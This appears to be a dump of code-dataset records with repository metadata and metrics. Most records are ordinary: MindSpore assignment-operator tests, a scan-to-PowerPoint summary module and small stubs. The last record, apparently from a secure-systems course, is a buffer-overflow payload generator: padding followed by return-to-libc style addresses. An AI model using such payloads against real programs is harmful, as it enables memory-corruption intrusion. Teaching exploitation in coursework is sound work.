return self.label | 19.666667 | 58 | 0.679661 | 73 | 590 | 5.410959 | 0.356164 | 0.070886 | 0.055696 | 0.070886 | 0.713924 | 0.713924 | 0.713924 | 0.713924 | 0.713924 | 0.713924 | 0 | 0 | 0.237288 | 590 | 30 | 59 | 19.666667 | 0.877778 | 0 | 0 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0 | 0.083333 | 0.083333 | 0.833333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
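# A short construction example for the dataclasses above; the dataclass is
# restated verbatim so the snippet runs standalone, and the URIs are invented.

```python
from dataclasses import dataclass, field
from typing import List, Set

@dataclass
class OntClass:  # restated from the module above so the sketch is standalone
    uri: str
    label: str
    aliases: List[str]
    description: str
    parents: List[str]
    parents_closure: Set[str] = field(default_factory=set)

    @property
    def readable_label(self):
        return self.label

person = OntClass(
    uri="http://example.org/Person",          # hypothetical URI
    label="Person",
    aliases=["Human"],
    description="A human being",
    parents=["http://example.org/Agent"],     # hypothetical parent URI
)
# parents_closure defaults to an empty set; seed it with the direct parents.
person.parents_closure.update(person.parents)
```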
7ae2cf1ccad8cecbf0a0bc8a3d2be40943a04509 | 34 | py | Python | runtest.py | tzakrajs/yaiges | 046e376dc7a03466cf2860cf29509d251ed667e3 | [
"Apache-2.0"
] | null | null | null | runtest.py | tzakrajs/yaiges | 046e376dc7a03466cf2860cf29509d251ed667e3 | [
"Apache-2.0"
] | null | null | null | runtest.py | tzakrajs/yaiges | 046e376dc7a03466cf2860cf29509d251ed667e3 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python3
import asyncio
| 11.333333 | 18 | 0.764706 | 5 | 34 | 5.2 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.032258 | 0.088235 | 34 | 2 | 19 | 17 | 0.806452 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
7aefb3899ee49c492294932181e2bb7dbac73100 | 14,571 | py | Python | tests/syntax/simple_expression/test_assignment_ops.py | PowerOlive/mindspore | bda20724a94113cedd12c3ed9083141012da1f15 | [
"Apache-2.0"
] | 3,200 | 2020-02-17T12:45:41.000Z | 2022-03-31T20:21:16.000Z | tests/syntax/simple_expression/test_assignment_ops.py | zimo-geek/mindspore | 665ec683d4af85c71b2a1f0d6829356f2bc0e1ff | [
"Apache-2.0"
] | 176 | 2020-02-12T02:52:11.000Z | 2022-03-28T22:15:55.000Z | tests/syntax/simple_expression/test_assignment_ops.py | zimo-geek/mindspore | 665ec683d4af85c71b2a1f0d6829356f2bc0e1ff | [
"Apache-2.0"
] | 621 | 2020-03-09T01:31:41.000Z | 2022-03-30T03:43:19.000Z | # Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
import numpy as np
import mindspore.context as context
import mindspore.nn as nn
from mindspore import Tensor, Parameter
from mindspore.common.initializer import initializer
from mindspore.ops import operations as P
context.set_context(mode=context.GRAPH_MODE)
class Assign(nn.Cell):
def __init__(self, x, y):
super(Assign, self).__init__()
self.x = Parameter(initializer(x, x.shape), name="x")
self.y = Parameter(initializer(y, y.shape), name="y")
self.assign = P.Assign()
def construct(self):
self.assign(self.y, self.x)
return self.y
def test_assign_bool():
x = Tensor(np.ones([3, 3]).astype(np.bool_))
y = Tensor(np.zeros([3, 3]).astype(np.bool_))
assign = Assign(x, y)
output = assign()
output = output.asnumpy()
output_expect = np.ones([3, 3]).astype(np.bool_)
print(output)
assert np.all(output == output_expect)
def test_assign_int8():
x = Tensor(np.ones([3, 3]).astype(np.int8))
y = Tensor(np.zeros([3, 3]).astype(np.int8))
assign = Assign(x, y)
output = assign()
output = output.asnumpy()
output_expect = np.ones([3, 3]).astype(np.int8)
print(output)
assert np.all(output == output_expect)
def test_assign_uint8():
x = Tensor(np.ones([3, 3]).astype(np.uint8))
y = Tensor(np.zeros([3, 3]).astype(np.uint8))
assign = Assign(x, y)
output = assign()
output = output.asnumpy()
output_expect = np.ones([3, 3]).astype(np.uint8)
print(output)
assert np.all(output == output_expect)
def test_assign_int16():
x = Tensor(np.ones([3, 3]).astype(np.int16))
y = Tensor(np.zeros([3, 3]).astype(np.int16))
assign = Assign(x, y)
output = assign()
output = output.asnumpy()
output_expect = np.ones([3, 3]).astype(np.int16)
print(output)
assert np.all(output == output_expect)
def test_assign_uint16():
x = Tensor(np.ones([3, 3]).astype(np.uint16))
y = Tensor(np.zeros([3, 3]).astype(np.uint16))
assign = Assign(x, y)
output = assign()
output = output.asnumpy()
output_expect = np.ones([3, 3]).astype(np.uint16)
print(output)
assert np.all(output == output_expect)
def test_assign_int32():
x = Tensor(np.ones([3, 3]).astype(np.int32))
y = Tensor(np.zeros([3, 3]).astype(np.int32))
assign = Assign(x, y)
output = assign()
output = output.asnumpy()
output_expect = np.ones([3, 3]).astype(np.int32)
print(output)
assert np.all(output == output_expect)
def test_assign_uint32():
x = Tensor(np.ones([3, 3]).astype(np.uint32))
y = Tensor(np.zeros([3, 3]).astype(np.uint32))
assign = Assign(x, y)
output = assign()
output = output.asnumpy()
output_expect = np.ones([3, 3]).astype(np.uint32)
print(output)
assert np.all(output == output_expect)
def test_assign_int64():
x = Tensor(np.ones([3, 3]).astype(np.int64))
y = Tensor(np.zeros([3, 3]).astype(np.int64))
assign = Assign(x, y)
output = assign()
output = output.asnumpy()
output_expect = np.ones([3, 3]).astype(np.int64)
print(output)
assert np.all(output == output_expect)
def test_assign_uint64():
x = Tensor(np.ones([3, 3]).astype(np.uint64))
y = Tensor(np.zeros([3, 3]).astype(np.uint64))
assign = Assign(x, y)
output = assign()
output = output.asnumpy()
output_expect = np.ones([3, 3]).astype(np.uint64)
print(output)
assert np.all(output == output_expect)
def test_assign_float16():
x = Tensor(np.array([[0.1, 0.2, 0.3],
[0.4, 0.5, 0.5],
[0.6, 0.7, 0.8]]).astype(np.float16))
y = Tensor(np.array([[0.4, 0.5, 0.5],
[0.6, 0.7, 0.8],
[0.1, 0.2, 0.3]]).astype(np.float16))
assign = Assign(x, y)
output = assign()
output = output.asnumpy()
output_expect = np.array([[0.1, 0.2, 0.3],
[0.4, 0.5, 0.5],
[0.6, 0.7, 0.8]]).astype(np.float16)
print(output)
assert np.all(output - output_expect < 1e-6)
def test_assign_float32():
x = Tensor(np.array([[0.1, 0.2, 0.3],
[0.4, 0.5, 0.5],
[0.6, 0.7, 0.8]]).astype(np.float32))
y = Tensor(np.array([[0.4, 0.5, 0.5],
[0.6, 0.7, 0.8],
[0.1, 0.2, 0.3]]).astype(np.float32))
assign = Assign(x, y)
output = assign()
output = output.asnumpy()
output_expect = np.array([[0.1, 0.2, 0.3],
[0.4, 0.5, 0.5],
[0.6, 0.7, 0.8]]).astype(np.float32)
print(output)
assert np.all(output - output_expect < 1e-6)
def test_assign_float64():
x = Tensor(np.array([[0.1, 0.2, 0.3],
[0.4, 0.5, 0.5],
[0.6, 0.7, 0.8]]).astype(np.float64))
y = Tensor(np.array([[0.4, 0.5, 0.5],
[0.6, 0.7, 0.8],
[0.1, 0.2, 0.3]]).astype(np.float64))
assign = Assign(x, y)
output = assign()
output = output.asnumpy()
output_expect = np.array([[0.1, 0.2, 0.3],
[0.4, 0.5, 0.5],
[0.6, 0.7, 0.8]]).astype(np.float64)
print(output)
assert np.all(output - output_expect < 1e-6)
class AssignAdd(nn.Cell):
def __init__(self, x, y):
super(AssignAdd, self).__init__()
self.x = Parameter(initializer(x, x.shape), name="x")
self.y = Parameter(initializer(y, y.shape), name="y")
self.assignadd = P.AssignAdd()
def construct(self):
self.assignadd(self.y, self.x)
return self.y
def test_number_assignadd_number():
input_x = 2
result1 = 5
result2 = 5
result1 += input_x
assignadd = AssignAdd(result2, input_x)
result2 = assignadd()
expect = 7
assert np.all(result1 == expect)
assert np.all(result2 == expect)
def test_tensor_assignadd_tensor():
input_x = Tensor(np.array([[2, 2], [3, 3]]))
result1 = Tensor(np.array([[4, -2], [2, 17]]))
result2 = Tensor(np.array([[4, -2], [2, 17]]))
result1 += input_x
result2 = AssignAdd(result2, input_x)()
expect = Tensor(np.array([[6, 0], [5, 20]]))
assert np.all(result1.asnumpy() == expect)
assert np.all(result2.asnumpy() == expect)
def test_tensor_assignadd_number():
input_x = 3
result1 = Tensor(np.array([[4, -2], [2, 17]])).astype(np.float16)
result2 = Tensor(np.array([[4, -2], [2, 17]])).astype(np.float16)
result1 += input_x
result2 = AssignAdd(result2, input_x)()
expect = Tensor(np.array([[7, 1], [5, 20]]))
assert np.all(result1.asnumpy() == expect)
assert np.all(result2.asnumpy() == expect)
def test_number_assignadd_tensor():
result1 = 3
result2 = 3
input_x = Tensor(np.array([[4, -2], [2, 17]])).astype(np.float16)
result1 += input_x
result2 = AssignAdd(result2, input_x)()
expect = Tensor(np.array([[7, 1], [5, 20]]))
assert np.all(result1.asnumpy() == expect)
assert np.all(result2.asnumpy() == expect)
def test_tuple_assignadd_tuple():
result1 = (1, 2, 3, 4)
result2 = (1, 2, 3, 4)
input_x = (2, 3, 4, 5, 6)
result1 += input_x
result2 = AssignAdd(result2, input_x)()
expect = (1, 2, 3, 4, 2, 3, 4, 5, 6)
    assert result1 == expect
    assert result2 == expect
def test_string_assignadd_string():
result1 = "string111"
result2 = "string111"
input_x = "string222"
result1 += input_x
result2 = AssignAdd(result2, input_x)()
expect = "string111string222"
assert result1 == expect
assert result2 == expect
class AssignSub(nn.Cell):
def __init__(self, x, y):
super(AssignSub, self).__init__()
self.x = Parameter(initializer(x, x.shape), name="x")
self.y = Parameter(initializer(y, y.shape), name="y")
self.assignsub = P.AssignSub()
def construct(self):
self.assignsub(self.y, self.x)
return self.y
def test_number_assignsub_number():
input_x = 2
result1 = 5
result2 = 5
result1 -= input_x
result2 = AssignSub(result2, input_x)()
expect = 3
assert np.all(result1 == expect)
assert np.all(result2 == expect)
def test_tensor_assignsub_tensor():
input_x = Tensor(np.array([[2, 2], [3, 3]]))
result1 = Tensor(np.array([[4, -2], [2, 17]]))
result2 = Tensor(np.array([[4, -2], [2, 17]]))
result1 -= input_x
result2 = AssignSub(result2, input_x)()
expect = Tensor(np.array([[2, -4], [-1, 14]]))
assert np.all(result1.asnumpy() == expect)
assert np.all(result2.asnumpy() == expect)
def test_tensor_assignsub_number():
input_x = 3
result1 = Tensor(np.array([[4, -2], [2, 17]])).astype(np.float16)
result2 = Tensor(np.array([[4, -2], [2, 17]])).astype(np.float16)
result1 -= input_x
result2 = AssignSub(result2, input_x)()
expect = Tensor(np.array([[1, -5], [-1, 14]]))
assert np.all(result1.asnumpy() == expect)
assert np.all(result2.asnumpy() == expect)
def test_number_assignsub_tensor():
result1 = 3
result2 = 3
input_x = Tensor(np.array([[4, -2], [2, 17]])).astype(np.float16)
result1 -= input_x
result2 = AssignSub(result2, input_x)()
expect = Tensor(np.array([[-1, 5], [1, -14]]))
assert np.all(result1.asnumpy() == expect)
assert np.all(result2.asnumpy() == expect)
def test_number_assignmul_number():
input_x = 2
result = 5
result *= input_x
expect = 10
assert np.all(result == expect)
def test_tensor_assignmul_tensor():
input_x = Tensor(np.array([[2, 2], [3, 3]]))
result = Tensor(np.array([[4, -2], [2, 17]]))
result *= input_x
expect = Tensor(np.array([[8, -4], [6, 51]]))
assert np.all(result.asnumpy() == expect)
def test_tensor_assignmul_number():
input_x = 3
result = Tensor(np.array([[4, -2], [2, 17]])).astype(np.float16)
result *= input_x
expect = Tensor(np.array([[12, -6], [6, 51]]))
assert np.all(result.asnumpy() == expect)
def test_number_assignmul_tensor():
result = 3
input_x = Tensor(np.array([[4, -2], [2, 17]])).astype(np.float16)
result *= input_x
expect = Tensor(np.array([[12, -6], [6, 51]]))
assert np.all(result.asnumpy() == expect)
def test_number_assigndiv_number():
input_x = 2
result = 5
result /= input_x
expect = 2.5
assert np.all(result == expect)
def test_tensor_assigndiv_tensor():
input_x = Tensor(np.array([[2, 2], [3, 3]]))
result = Tensor(np.array([[4, -2], [6, 15]]))
result /= input_x
expect = Tensor(np.array([[2, -1], [2, 5]]))
assert np.all(result.asnumpy() == expect)
def test_tensor_assigndiv_number():
input_x = 3
result = Tensor(np.array([[9, -3], [6, 15]])).astype(np.float16)
result /= input_x
expect = Tensor(np.array([[3, -1], [2, 5]]))
assert np.all(result.asnumpy() == expect)
def test_number_assigndiv_tensor():
result = 3
input_x = Tensor(np.array([[2, -2], [2, -2]])).astype(np.float16)
result /= input_x
expect = Tensor(np.array([[1.5, -1.5], [1.5, -1.5]]))
assert np.all(result.asnumpy() == expect)
def test_number_assignmod_number():
input_x = 2
result = 5
result %= input_x
expect = 1
assert np.all(result == expect)
def test_tensor_assignmod_tensor():
input_x = Tensor(np.array([[2, 2], [3, 3]]))
result = Tensor(np.array([[4, -2], [6, 15]]))
result %= input_x
expect = Tensor(np.array([[0, 0], [0, 0]]))
assert np.all(result.asnumpy() == expect)
def test_tensor_assignmod_number():
input_x = 3
result = Tensor(np.array([[9, -3], [7, 15]])).astype(np.float16)
result %= input_x
expect = Tensor(np.array([[0, 0], [1, 0]]))
assert np.all(result.asnumpy() == expect)
def test_number_assignmod_tensor():
result = 3
input_x = Tensor(np.array([[2, -2], [2, -2]])).astype(np.float16)
result %= input_x
expect = Tensor(np.array([[1, -1], [1, -1]]))
assert np.all(result.asnumpy() == expect)
def test_number_assignmulmul_number():
input_x = 2
result = 5
result **= input_x
expect = 25
assert np.all(result == expect)
def test_tensor_assignmulmul_tensor():
input_x = Tensor(np.array([[2, 2], [3, 3]]))
result = Tensor(np.array([[4, -2], [6, 5]]))
result **= input_x
expect = Tensor(np.array([[16, 4], [216, 125]]))
assert np.all(result.asnumpy() == expect)
def test_tensor_assignmulmul_number():
input_x = 3
result = Tensor(np.array([[9, -3], [7, 5]])).astype(np.float16)
result **= input_x
expect = Tensor(np.array([[729, -27], [343, 125]]))
assert np.all(result.asnumpy() == expect)
def test_number_assignmulmul_tensor():
result = 3
input_x = Tensor(np.array([[2, 2], [2, 2]])).astype(np.float16)
result **= input_x
expect = Tensor(np.array([[9, 9], [9, 9]]))
assert np.all(result.asnumpy() == expect)
def test_number_assigndivdiv_number():
input_x = 2
result = 5
result //= input_x
expect = 2
assert np.all(result == expect)
def test_tensor_assigndivdiv_tensor():
input_x = Tensor(np.array([[2, 2], [3, 3]]))
result = Tensor(np.array([[4, -2], [6, 6]]))
result //= input_x
expect = Tensor(np.array([[2, -1], [2, 2]]))
assert np.all(result.asnumpy() == expect)
def test_tensor_assigndivdiv_number():
input_x = 3
result = Tensor(np.array([[9, -3], [15, 9]])).astype(np.float16)
result //= input_x
expect = Tensor(np.array([[3, -1], [5, 3]]))
assert np.all(result.asnumpy() == expect)
def test_number_assigndivdiv_tensor():
result = 3
input_x = Tensor(np.array([[1, 2], [2, 2]])).astype(np.float16)
result //= input_x
expect = Tensor(np.array([[3, 1], [1, 1]]))
assert np.all(result.asnumpy() == expect)
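# The tests above pair Python's augmented assignment operators with MindSpore's
# Assign/AssignAdd/AssignSub ops. A stdlib-only sketch of the distinction they
# exercise: `+=` on an immutable value rebinds the local name, while an
# element-wise in-place update mutates shared state, which is what the Assign*
# ops do to Parameters. The numbers mirror test_tensor_assignadd_tensor; no
# MindSpore is needed to run this.

```python
def augmented_add(value, delta):
    value += delta            # rebinds the local name for immutable values
    return value

n = 5
assert augmented_add(n, 2) == 7
assert n == 5                 # the caller's binding is untouched

def assign_add_inplace(target, delta):
    """Element-wise in-place add, analogous to P.AssignAdd on a Parameter."""
    for i, d in enumerate(delta):
        target[i] += d        # mutates the shared container
    return target

buf = [4, -2, 2, 17]
out = assign_add_inplace(buf, [2, 2, 3, 3])
assert out is buf             # same object, updated in place
assert buf == [6, 0, 5, 20]   # same result as test_tensor_assignadd_tensor
```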
| 30.293139 | 78 | 0.589596 | 2,134 | 14,571 | 3.914714 | 0.074039 | 0.073737 | 0.091812 | 0.03232 | 0.848216 | 0.824635 | 0.821882 | 0.803328 | 0.715825 | 0.672851 | 0 | 0.0664 | 0.226889 | 14,571 | 480 | 79 | 30.35625 | 0.675189 | 0.043786 | 0 | 0.614555 | 0 | 0 | 0.003664 | 0 | 0 | 0 | 0 | 0 | 0.140162 | 1 | 0.12938 | false | 0 | 0.016173 | 0 | 0.161725 | 0.032345 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
24cca90261604a465cd68c565c39e57d7d5b47ed | 49 | py | Python | pypureclient/flasharray/__init__.py | tlewis-ps/py-pure-client | 589b2c0dc0a5e890eb74902a8056e43723400d50 | [
"BSD-2-Clause"
] | null | null | null | pypureclient/flasharray/__init__.py | tlewis-ps/py-pure-client | 589b2c0dc0a5e890eb74902a8056e43723400d50 | [
"BSD-2-Clause"
] | 1 | 2021-11-17T18:59:56.000Z | 2021-11-17T18:59:56.000Z | pypureclient/flasharray/__init__.py | tlewis-ps/py-pure-client | 589b2c0dc0a5e890eb74902a8056e43723400d50 | [
"BSD-2-Clause"
] | 1 | 2021-11-02T21:47:34.000Z | 2021-11-02T21:47:34.000Z | from .FA_2_4 import *
from .client import Client
| 16.333333 | 26 | 0.77551 | 9 | 49 | 4 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.04878 | 0.163265 | 49 | 2 | 27 | 24.5 | 0.829268 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
700b58cb81b44a35238b337b16fdc6042fccf45b | 18,187 | py | Python | build/bdist.macosx-10.9-x86_64/wininst/PURELIB/data_xray/report/core.py | amplifilo/data-xray | c68c9b352efde0776189210794aeef84ae2cf6c2 | [
"Apache-2.0"
] | null | null | null | build/bdist.macosx-10.9-x86_64/wininst/PURELIB/data_xray/report/core.py | amplifilo/data-xray | c68c9b352efde0776189210794aeef84ae2cf6c2 | [
"Apache-2.0"
] | null | null | null | build/bdist.macosx-10.9-x86_64/wininst/PURELIB/data_xray/report/core.py | amplifilo/data-xray | c68c9b352efde0776189210794aeef84ae2cf6c2 | [
"Apache-2.0"
] | null | null | null | from ..scan import PlotImage
from ..grid import *
import os
import re
import numpy as np
from pptx import Presentation
from pptx.util import Inches
from matplotlib import pyplot as plt
import pandas as pd
#some utilies to work with powerpoint
meanstd = lambda arr: np.std(np.ravel(arr)/np.mean(np.ravel(arr)))
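# `meanstd` above is the coefficient of variation — the standard deviation of
# the mean-normalised signal — and `insert_data` keeps channels scoring above 2.
# A stdlib-only sketch of the same heuristic (the sample channels are invented):

```python
from statistics import mean, pstdev

def coeff_of_variation(values):
    """std of the mean-normalised signal, i.e. what `meanstd` computes."""
    values = list(values)
    m = mean(values)
    return pstdev(v / m for v in values)

# A flat channel scores near 0; one strong feature among mostly-empty
# samples scores high, so only the latter is selected for plotting.
flat = [1.0] * 8
spiky = [0.0] * 7 + [8.0]
keep = [name for name, sig in [("flat", flat), ("spiky", spiky)]
        if coeff_of_variation(sig) > 2]
```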
class SummaryPPT(object):
def __init__(self, pname="image_summary", new=False, fdict=None, maximages=50, chanselect = {'scan':'Z', 'grid':'cf'}, **kwargs):
if fdict is None:
print('please specify data to summarize')
return
else:
fdicts = [fdict[i:i + maximages] for i in range(0, len(fdict), maximages)]
self.topdir = os.path.commonpath([j.fname for j in fdict]) + '/'
self.chanselect = chanselect
for j,f in enumerate(fdicts):
self.presentation_name = pname + '_' + str(j)
self.pptx_file_name = self.topdir + self.presentation_name + '.pptx'
self.fdict = f
#self.new = new
self.init_ppt(self.presentation_name)
#self.insert_images()
self.insert_data()
            self.pres.save(self.pptx_file_name)
            print('batch ' + str(j) + ' stored in: ' + self.pptx_file_name)
    def init_ppt(self, presentation_name):
        pres = Presentation()
        pres.notes_master.name = presentation_name
        self.pres = pres
def insert_data(self):
for fj in self.fdict:
if re.findall('sxm', fj.fname):
try:
if self.chanselect == "Automatic":
# attempt to recognize good data
plotsignals = []
for c in fj.signals.keys():
sig = fj.signals[c]['forward']
sig = sig[~np.isnan(sig)]
if meanstd(sig) > 2:
plotsignals.append(c)
plotsignals.append('Z')
                        plotsignals = list(set(plotsignals))  # no double Z
else:
plotsignals = self.chanselect['scan']
nrows = 2 if len(plotsignals) > 2 else 1
ncols = int(np.ceil(len(plotsignals) / nrows))
f3, a3 = plt.subplots(nrows, ncols);
                    if not isinstance(a3, np.ndarray):  # a single Axes object
                        a3 = [a3]
for c, a in zip(plotsignals, np.ravel(a3)):
PlotImage(fj, chan=c, ax=a, high_pass=None);
[a.axis('off') for a in np.ravel(a3)]
xy = ['X', 'Y']
offset = fj.header['scan_offset'] / 1e-9
xyoffsets = [xy[j] + '=' + str(np.round(offset[j], 2)) + ' nm ' for j in [0, 1]]
titleString = [fj.fname]
titleString.append('Bias: ' + str(fj.header['bias']) + 'V')
titleString.append('Control: ' + fj.header['z-controller']['Name'][0])
titleString.append('Offsets: ' + xyoffsets[0] + xyoffsets[1])
titleString.append('Resolution: ' + str(fj.header['scan_pixels']))
self.fig_to_ppt([f3], leftop=[1, 2], txt=titleString)
print(os.path.basename(fj.ds.fname) + ' imported')
f3.clf(); # close figure so that it doesn't clog up in the end
except:
print(os.path.basename(fj.fname) + ' failed')
elif re.findall('3ds', fj.fname):
try:
fig, ax = plt.subplots(1, 2)
ChanHistogramDS(fj.ds, xy=['bias', self.chanselect['grid']], xymod=[lambda x: x, lambda x: x / np.mean(np.ravel(x))],
ax=ax[0], label=['bias', self.chanselect['grid'], ''])
# plop in a clustered map
km = ChanPcaKmeansDS(fj.ds, xvec='bias', chan=self.chanselect['grid'], mod=lambda x: x / np.mean(np.ravel(x)),
comps=6, nclust=4, fig=None)
ax[1].imshow(km)
#plt.colorbar()
titleString = [fj.fname]
except:
print(os.path.basename(fj.fname) + ' failed. Import skipped')
continue
# titleString.append('Bias: ' + str(fj.header['bias']) + 'V')
# titleString.append('Control: ' + fj.header['z-controller']['Name'][0])
# titleString.append('Offsets: ' + xyoffsets[0] + xyoffsets[1])
# titleString.append('Resolution: ' + str(fj.header['scan_pixels']))
try:
self.fig_to_ppt([fig], leftop=[1, 2], txt=titleString)
print(os.path.basename(fj.fname) + ' imported')
fig.clf(); # close figure so that it doesn't clog up in the end
except:
print(os.path.basename(fj.fname) + ' import into ppt failed')
def insert_maps(self, mapchan=['cf']):
#plop in a histogram of the map channel across the whole thing
for fj in self.fdict:
fig,ax=plt.subplots(2,1, figsize=(8,5))
ChanHistogramDS(fj.ds, xy=['bias',mapchan[0]], xymod=[lambda x:x,lambda x:x/np.mean(np.ravel(x))], ax=ax[0], label=['bias',mapchan[0][:-1],''])
#plop in a clustered map
km = ChanPcaKmeansDS(fj.ds, xvec='bias', chan=mapchan[0], mod = lambda x: x/np.mean(np.ravel(x)), comps=6, nclust=4, fig=None)
ax[1].imshow(km)
plt.colorbar()
#fig.savefig("pca_3d.png",bbox_inches='tight')
###need to add name attribute to grids
titleString = [fj.fname]
# titleString.append('Bias: ' + str(fj.header['bias']) + 'V')
# titleString.append('Control: ' + fj.header['z-controller']['Name'][0])
# titleString.append('Offsets: ' + xyoffsets[0] + xyoffsets[1])
# titleString.append('Resolution: ' + str(fj.header['scan_pixels']))
            try:
                self.fig_to_ppt([fig], leftop=[1, 2], txt=titleString)
                print(os.path.basename(fj.ds.fname) + ' imported')
                fig.clf()  # close the figure so it doesn't clog up at the end
            except:
                print(os.path.basename(fj.ds.fname) + ' failed')
return
def insert_images(self):
"""
Dumpt a batch of images into a powerpoint
:param chanselect:
:param fdict:
:param topdir:
:return:
"""
#for folder in (self.fdict.keys()):
# self.text_to_slide(folder)
# newpres = Presentation()
# newpres.notes_master.name = 'sum1.pptx'
# newpres.save(newpres.notes_master.name)
for fj in self.fdict:
# TextToSlide(fj.fname,pres=pres)
try:
# scf = {1:(12,6), 2:(12,9), 3:(12,10)}
if self.chanselect == "Automatic":
#attempt to recognize good data
plotsignals = []
for c in fj.signals.keys():
sig = fj.signals[c]['forward']
sig = sig[~np.isnan(sig)]
if meanstd(sig) > 2:
plotsignals.append(c)
plotsignals.append('Z')
                    plotsignals = list(set(plotsignals))  # no double Z
else:
plotsignals = self.chanselect
nrows = 2 if len(plotsignals) > 2 else 1
ncols = int(np.ceil(len(plotsignals)/nrows))
f3, a3 = plt.subplots(nrows,ncols);
                if not isinstance(a3, np.ndarray):  # a single Axes object
                    a3 = [a3]
for c,a in zip(plotsignals,np.ravel(a3)):
PlotImage(fj, chan=c, ax=a, high_pass=None);
[a.axis('off') for a in np.ravel(a3)]
xy = ['X','Y']
offset = fj.header['scan_offset']/1e-9
xyoffsets = [xy[j] + '=' + str(np.round(offset[j],2)) + ' nm ' for j in [0,1]]
titleString = [fj.fname]
titleString.append('Bias: ' + str(fj.header['bias']) + 'V')
titleString.append('Control: ' + fj.header['z-controller']['Name'][0])
titleString.append('Offsets: ' + xyoffsets[0] + xyoffsets[1])
titleString.append('Resolution: ' + str(fj.header['scan_pixels']))
self.fig_to_ppt([f3], leftop=[1, 2], txt=titleString)
print(os.path.basename(fj.ds.fname) + ' imported')
f3.clf(); #close figure so that it doesn't clog up in the end
except:
print(os.path.basename(fj.ds.fname) + ' failed')
def png_to_ppt(self, pngfile, ttl = []):
"""
Plop a PNG file into powerpoint slide
:param pngfile:
:param pres:
:param ttl:
:return:
"""
#blank_slide_layout = pres.slide_layouts[6]
title_slide_layout = self.pres.slide_layouts[9]
left = top = Inches(1)
slide = self.pres.slides.add_slide(title_slide_layout)
slide.shapes.add_picture(pngfile, left, top)
subtitle = slide.placeholders[1]
title = slide.shapes.title
if len(ttl):
subtitle.text = ttl
def fig_to_ppt(self, figs, leftop=[0,1.5], txt=None):
"""
Plop figures into powerpoint
:param figs:
:param pres:
:param leftop:
:param txt:
:return:
"""
#savepptx needs to be a full path. If None is provided the default presentation
#will be created with a name sum1.pptx in the current folder
from pptx.util import Inches
blank_slide_layout = self.pres.slide_layouts[5]
left = Inches(leftop[0])
top = Inches(leftop[1])
tmp_path = 't1.png'
for figp in figs:
plt.savefig(tmp_path, transparent=1, format='png', dpi=300, bbox_inches = 'tight')
slide = self.pres.slides.add_slide(blank_slide_layout)
slide.shapes.add_picture(tmp_path, left, top)
if txt is not None:
self.text_to_slide(txt, slide=slide)
def text_to_slide(self, txt, slide=None): #lets make txt a list of strings
"""
convert text to slide
:param txt: list of strings
:param pres:
:param slide:
:return:
"""
from pptx.util import Pt
#title = slide.shapes.title
#subtitle = slide.placeholders[1]
# title.text = "Hello, World!"
#subtitle.text = "python-pptx was here!"
# prs.save('test.pptx')
from pptx.util import Inches
if self.pres == None:
print('please init presentation')
else:
if slide is None:
bullet_slide_layout = self.pres.slide_layouts[5]
slide = self.pres.slides.add_slide(bullet_slide_layout)
shapes = slide.shapes
countshapes = 0
#just catch the first shape object with a frame in it
for shape in slide.shapes:
if not shape.has_text_frame:
continue
elif countshapes > 0:
tframe = shape.text_frame
tframe.clear()
#print('caught one')
else:
text_frame = shape.text_frame
text_frame.clear()
countshapes = 1
text_frame.clear()
p = text_frame.paragraphs[0]
for t in txt:
run = p.add_run()
run.text = t
font = run.font
font.name = 'Calibri'
font.size = Pt(12)
# p.text = t
p = text_frame.add_paragraph()
702edac88458909cbf9bb408ff36f4f7c52574a5 | 84 | py | Python | nptel_modules/module3/payload_generator_with_exit.py | ByteHackr/SecureSystemEngineering_IITM | 94319e9111a42ed9de837c78f14271d9cf65b5e5 | [
"MIT"
] | null | null | null | nptel_modules/module3/payload_generator_with_exit.py | ByteHackr/SecureSystemEngineering_IITM | 94319e9111a42ed9de837c78f14271d9cf65b5e5 | [
"MIT"
] | null | null | null | nptel_modules/module3/payload_generator_with_exit.py | ByteHackr/SecureSystemEngineering_IITM | 94319e9111a42ed9de837c78f14271d9cf65b5e5 | [
"MIT"
] | null | null | null | y = "A"*76 + "\x40\x29\xe4\xf7" + "\xb0\x67\xe3\xf7" + "\x2b\x10\xf6\xf7"
print y
